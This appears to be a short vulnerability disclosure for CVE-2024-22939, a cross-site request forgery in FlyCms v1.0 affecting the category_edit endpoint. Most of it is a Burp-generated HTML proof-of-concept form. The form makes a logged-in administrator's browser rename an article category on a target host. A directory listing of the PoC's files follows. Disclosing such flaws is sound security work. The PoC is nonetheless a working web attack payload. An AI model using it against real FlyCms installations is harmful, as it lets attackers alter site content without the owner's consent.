CVE-2024-22939target:https://github.com/sunkaifei/FlyCms
version: v1.0
FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /system/article/category_edit

Poc
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.247.192/system/article/category_edit?id=1&name=%E7%A7%BB%E5%8A%A8%E5%BC%80%E5%8F%91123" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

Success:

[4.0K] /data/pocs/75399d6a8d210acfe74d2d1684da03835793fd00
├── [4.0K] image
│ ├── [ 30K] image-20240109075756056.png
│ ├── [132K] image-20240109075931640.png
│ └── [ 28K] image-20240109080027562.png
└── [ 753] README.md
1 directory, 4 files